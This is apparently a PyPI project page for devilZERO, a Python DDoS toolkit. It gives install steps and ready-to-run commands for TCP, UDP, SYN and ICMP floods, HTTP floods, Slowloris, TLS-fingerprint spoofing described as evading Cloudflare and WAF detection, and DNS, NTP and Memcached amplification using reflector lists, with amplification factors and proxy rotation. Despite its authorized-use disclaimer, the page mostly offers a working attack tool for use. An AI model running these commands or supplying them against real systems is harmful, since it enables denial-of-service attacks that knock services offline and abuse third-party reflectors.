Skip to main content

Modular DDoS stress-testing toolkit for authorized security assessments

Project description


Version   PyPI   Python   License   Platform


[!WARNING] devilZERO is intended exclusively for authorized security assessments, penetration testing engagements, and educational research. Using this tool against systems you do not own or have explicit written permission to test is illegal and unethical. The author assumes no liability for misuse.


Overview

devilZERO is a modular, Python-based stress-testing toolkit covering the most common DDoS vector categories. Designed for red team operators and network security researchers who need a clean, scriptable tool without unnecessary overhead.

  ██████╗ ███████╗██╗   ██╗██╗██╗     ███████╗███████╗██████╗  ██████╗
  ██╔══██╗██╔════╝██║   ██║██║██║     ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
  ██║  ██║█████╗  ██║   ██║██║██║       ███╔╝ █████╗  ██████╔╝██║   ██║
  ██║  ██║██╔══╝  ╚██╗ ██╔╝██║██║      ███╔╝  ██╔══╝  ██╔══██╗██║   ██║
  ██████╔╝███████╗ ╚████╔╝ ██║███████╗███████╗███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝  ╚═══╝  ╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝
                         v2.0.0 — Voktha / ValkorX

Features

Layer Methods Notes
Layer 4 TCP · UDP · SYN · ICMP SYN/ICMP require root
Layer 7 GET · POST · Slowloris · TLS Full HTTP/HTTPS + TLS fingerprint spoofing
Amplification DNS · NTP · RDP · CLDAP · Memcached · CharGen · ARD Requires root + reflector list
  • Interactive TUI — guided menu for quick sessions
  • CLI mode — fully scriptable for automation and pipelines
  • Proxy support — auto-download and rotation from public SOCKS4/SOCKS5/HTTP lists (parallel download)
  • Progress bar — real-time attack progress in terminal
  • Docker ready — isolated container deployment

Installation

One-liner via PyPI — pipx (recommended)

pipx install devilzero
devilzero

pipx installs the devilzero command globally in an isolated environment — no venv, no conflicts. Install pipx with: pip install --user pipx && pipx ensurepath

PyPI via pip

pip install --user devilzero
devilzero

Ensure ~/.local/bin is in your PATH.

From source — pipx

git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
pipx install .
devilzero

From source — pip

git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
pip install --user .
devilzero

Docker

git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
docker build -t devilzero .
docker run -it --rm devilzero

Development

git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
python3 -m venv venv && source venv/bin/activate
pip install -e .
devilzero

Usage

Interactive Menu

devilzero
  Main Menu:
  1) Layer4 (TCP/UDP/SYN/ICMP)
  2) Layer7 (GET/POST/SLOW/TLS)
  3) Amplification (DNS/NTP/RDP/CLDAP/MEM/CHAR/ARD)
  4) Exit

The menu prompts for target, method, thread count, duration, and proxy settings with sensible defaults.

CLI — Layer 4

# TCP flood
devilzero --layer4 192.168.1.100 80 TCP 200 --duration 60

# UDP flood
devilzero --layer4 192.168.1.100 53 UDP 200 --duration 60

# SYN flood (root required)
sudo devilzero --layer4 192.168.1.100 80 SYN 100 --duration 60

# ICMP flood (root required)
sudo devilzero --layer4 192.168.1.100 0 ICMP 100 --duration 60

CLI — Layer 7

# HTTP GET flood
devilzero --layer7 http://192.168.1.100 GET 300 --duration 120

# HTTP POST flood
devilzero --layer7 http://192.168.1.100 POST 300 --duration 120

# Slowloris — connection exhaustion
devilzero --layer7 http://192.168.1.100 SLOW 500 --duration 180

# TLS fingerprint spoofing (bypasses JA3/JA4 WAF detection)
devilzero --layer7 https://192.168.1.100 TLS 200 --duration 120

# Multiple requests per connection
devilzero --layer7 http://192.168.1.100 GET 200 --rpc 10 --duration 60

# With proxy rotation
devilzero --layer7 https://192.168.1.100 TLS 200 --duration 120 --proxy-file proxies.txt --proxy-type 5

CLI — Amplification

# DNS amplification (root required)
sudo devilzero --amp 192.168.1.100 53 DNS 50 /path/to/reflectors.txt --duration 60

# NTP amplification
sudo devilzero --amp 192.168.1.100 123 NTP 50 /path/to/reflectors.txt --duration 60

Reflector file format — one IP per line:

1.2.3.4
5.6.7.8

Global flags

Flag Default Description
--duration N 60 Attack duration in seconds (must be > 0)
--rpc N 1 Requests per connection (layer7 only)
--proxy-file PATH Proxy file for layer7 (one host:port per line)
--proxy-type N 5 Proxy type: 1=HTTP, 4=SOCKS4, 5=SOCKS5
--version Print version and exit

Method Reference

Layer 4

Method Protocol Root Description
TCP TCP No Raw TCP connection flood
UDP UDP No High-volume UDP datagram flood
SYN TCP/RAW Yes SYN flood with randomized spoofed source IP
ICMP ICMP/RAW Yes ICMP echo request flood

Layer 7

Method Description
GET HTTP GET flood with randomized User-Agent and Referer
POST HTTP POST flood with randomized body
SLOW Slowloris — keeps connections open, exhausts server thread pool
TLS Browser TLS/JA3/JA4 fingerprint spoofing via curl_cffi — bypasses Cloudflare and WAF bot detection

Amplification

Method Port Amplification factor
DNS 53 ~28–54×
NTP 123 ~556×
RDP 3389 ~85×
CLDAP 389 ~56–70×
MEM 11211 ~10,000–51,000×
CHAR 19 ~350×
ARD 3283 ~35×

Requirements

  • Python 3.8+
  • Linux / macOS (Windows untested)
  • Root privileges for: SYN, ICMP, all amplification methods

Dependencies are installed automatically by pip/pipx. See requirements.txt for the full list.


Project Structure

devilZERO/
├── devilzero/
│   ├── main.py           # Entry point, CLI parser, interactive menu
│   ├── layer4.py         # TCP/UDP/SYN/ICMP + amplification workers
│   ├── layer7.py         # HTTP GET/POST/Slowloris/TLS workers
│   ├── amplification.py  # Amplification stub (logic lives in layer4.py)
│   ├── proxy.py          # Proxy pool loader, parallel downloader, rotator
│   ├── config.py         # Configuration loader
│   ├── utils.py          # Colors, banner, packet helpers
│   └── data/
│       ├── config.json   # Proxy provider URLs
│       ├── useragent.txt # User-agent pool (932 entries)
│       ├── referers.txt  # Referer pool (574 entries)
│       └── headers.txt   # Additional HTTP headers pool
├── Dockerfile
├── docker-compose.yml
├── pyproject.toml
└── requirements.txt

Publishing / Updating

Maintainer workflow to publish a new release to PyPI:

# 1. Bump version in pyproject.toml and devilzero/__init__.py
# 2. Build
python3 -m build

# 3. Verify the package
twine check dist/*

# 4. Upload to PyPI (requires API token)
twine upload dist/*
# or with token inline:
# TWINE_USERNAME=__token__ TWINE_PASSWORD=pypi-... twine upload dist/*

After upload, users can install with:

pipx install devilzero          # global, isolated
pip install --user devilzero    # user install

Legal Disclaimer

This tool is provided for educational and authorized testing purposes only. The author (Voktha / ValkorX) is not responsible for any damage, legal consequences, or misuse resulting from the use of this software.

Before using devilZERO:

  • Obtain written authorization from the system owner
  • Comply with all applicable local and international laws
  • Never target infrastructure you do not own or have permission to test

Unauthorized use of this tool may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, or equivalent legislation in your jurisdiction.


Voktha · Red Team Operator

GitHub

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

devilzero-2.0.0.tar.gz (37.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

devilzero-2.0.0-py3-none-any.whl (35.9 kB view details)

Uploaded Python 3

File details

Details for the file devilzero-2.0.0.tar.gz.

File metadata

  • Download URL: devilzero-2.0.0.tar.gz
  • Upload date:
  • Size: 37.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.5

File hashes

Hashes for devilzero-2.0.0.tar.gz
Algorithm Hash digest
SHA256 47e18531a48e7f33a219fc75bbf504325a2b495afd8e7653aada1d4769b69f90
MD5 940244502732eeacf531b7b69140e22f
BLAKE2b-256 3c3989388590148d3217637c93806ae3b988a16598a1d60da189c0fd21c3b0cd

See more details on using hashes here.

File details

Details for the file devilzero-2.0.0-py3-none-any.whl.

File metadata

  • Download URL: devilzero-2.0.0-py3-none-any.whl
  • Upload date:
  • Size: 35.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.5

File hashes

Hashes for devilzero-2.0.0-py3-none-any.whl
Algorithm Hash digest
SHA256 f956f5899398f32979744d346e9b651f6656c1465768052b2e9fb830c201d875
MD5 799b00f5a09b2b6dc83a643f93b4aa20
BLAKE2b-256 cb54ccd5185607816b01ac4bafe30ee83bfb27929721152fcb33b171d7a404d1

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page